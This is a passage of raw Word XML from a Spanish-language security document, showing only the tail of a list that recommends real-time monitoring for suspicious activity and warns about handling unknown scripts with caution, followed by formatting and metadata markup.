        </w:rPr>
        <w:t>Monitoreo y respuesta</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9293B">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37595B20" w14:textId="77777777" w:rsidR="00C9293B" w:rsidRPr="00C9293B" w:rsidRDefault="00C9293B" w:rsidP="00C9293B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9293B">
        <w:t>Implementar soluciones de monitoreo que detecten actividad sospechosa en tiempo real.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A09A806" w14:textId="77777777" w:rsidR="00C9293B" w:rsidRPr="00C9293B" w:rsidRDefault="00C9293B" w:rsidP="00C9293B">
      <w:r w:rsidRPr="00C9293B">
        <w:t>Este tipo de amenazas es real y altamente dañino, por lo que siempre se debe manejar con cautela cualquier tipo de script o programa desconocido en un sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07696472" w14:textId="77777777" w:rsidR="00C9293B" w:rsidRDefault="00C9293B" w:rsidP="00C9293B"/>
    <w:sectPr w:rsidR="00C9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10E6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E41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164EB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CE62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D4A87"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ACB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6963">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1805467834">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="19616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3B"/>
    <w:rsid w:val="001D56F0"/>
    <w:rsid w:val="00812898"/>
    <w:rsid w:val="00AE52F8"/>
    <w:rsid w:val="00C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D02F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{CC95DADD-EC8A-491D-B539-52C18E09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2025-01-23T17:09:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-01-23T17:11:00Z</dcterms:modified>
</cp:coreProperties>
</file>